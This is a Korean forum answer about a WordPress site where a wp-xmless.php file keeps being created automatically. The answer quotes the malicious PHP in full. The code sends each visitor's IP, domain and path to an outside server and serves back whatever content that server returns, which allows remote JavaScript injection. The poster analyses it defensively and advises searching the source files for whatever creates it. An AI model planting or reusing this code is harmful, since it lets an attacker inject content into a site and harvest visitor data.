바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다. 채택완료

1. 이런코드입니다. 사이트에 원하는 javascript 코드를 심을 수 있겠는데요..
2.  
3. header(_typeGet());
4. echo _httpGet("http://vpbz.aug01code.com/htaccess.aspx?host=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&domain=" . urlencode($_SERVER["HTTP_HOST"]) . "&path=" . urlencode($_SERVER["REQUEST_URI"]));
5. function _httpGet($url){
6. $curl = curl_init();
7. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
8. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
9. curl_setopt($curl, CURLOPT_URL, $url);
10. $res = curl_exec($curl);
11. curl_close($curl);
12. return $res;
13. }
14. function _typeGet(){
15. $path = $_SERVER["REQUEST_URI"];
16. if (strpos($path, ".xml"))
17. return "Content-Type: application/xml";
18. if (strpos($path, ".js"))
19. return "Content-Type: application/javascript";
20. return "Content-Type: text/html";
21. }

모든 소스파일에서 wp-xmless.php 파일을 생성하는 부분이 없는지 찾아보셔야 할듯하시고.

우선 해당 부분을 풀어보면

http://vpbz.aug01code.com/htaccess.aspx?로 사용자의 도메인과 ip를 수집해가는거 같습니다.